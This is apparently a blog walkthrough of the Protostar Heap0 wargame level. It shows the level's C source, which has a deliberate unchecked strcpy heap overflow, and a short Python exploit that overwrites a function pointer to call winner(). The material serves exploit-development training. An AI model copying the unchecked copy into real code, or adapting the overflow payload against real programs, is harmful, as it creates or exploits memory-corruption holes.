Skip to main content

Binary Exploitation Protostar Heap0 - Walkthrough - Writeups

Hello Guyz,



Welcome again to my blog. Today, I am going to share with you my walkthrough experience of Exploit-Exercise Protostar Heap0 Level.

In This Level, Our Task Is to Execute Winner Function Through Heap Overflow Concept.


Before Starting Our Walkthrough Let's Take a Look At Hints And Details.

Note: I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
  • Understand all previous levels before starting this one.
  • Do some research on Assembly, C/C++ and Gdb
  • Do Some Research About Heap overflow exploitation.

Source Code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct data {
  char name[64];
};

struct fp {
  int (*fp)();
};

void winner()
{
  printf("level passed\n");
}

void nowinner()
{
  printf("level has not been passed\n");
}

int main(int argc, char **argv)
{
  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);
  
  f->fp();

}

Hint

This level introduces heap overflows and how they can influence code flow.

This level is at /opt/protostar/bin/heap0

Code Review

  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));   <--- Locating Space For data struct
  f = malloc(sizeof(struct fp));     <--- Locating Space For Fp Struct Just After The Data Struct.
  f->fp = nowinner;                  <--- Assign Nowinner Function Pointer To FP Struct

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);          <--- No Input Size verification. 
  
  f->fp();                           <--- Calling Inner function
  
  

Plan

As You Can See, In Source Code Their Is Nothing To Verify User Input. Hence, We can Easily Heap Overflow And Write Winner Function Address.

Implementation

  Heap Overview
 -------------------------------
 | Name[64]              | FP  |
 -------------------------------
  
  Overflow Name And Write Data To FP

Exploit

#!/usr/bin/python
import struct
# /opt/protostar/bin/heap0 $(python exploit.py)

buf = "a"*72
win = 0x08048464
ret = struct.pack("I",win)


payload = ''
payload+= buf
payload+= ret
print payload

For More Detailed Walk through Check Below Provided YouTube Video Playlist



Related Post

Top Visited

Big List Of Google Dorks For Sqli Injection

how to install burp suite in Linux/Ubuntu 16.04

Create Simple Packet Sniffer Using Python

Create Ping Sweeping Script Using Python

Python Beautiful Soup Module - Tutorial - Part 2

how to configure burpsuite with firefox?

Latest Google Dorks List

List of Keyboard Shortcuts Keys for GNOME Desktop (Kali linux / Linux / Ubuntu/*nix )

What is Burp Suite And its Features?

What is the use of Pseudo header in TCP/UDP packets?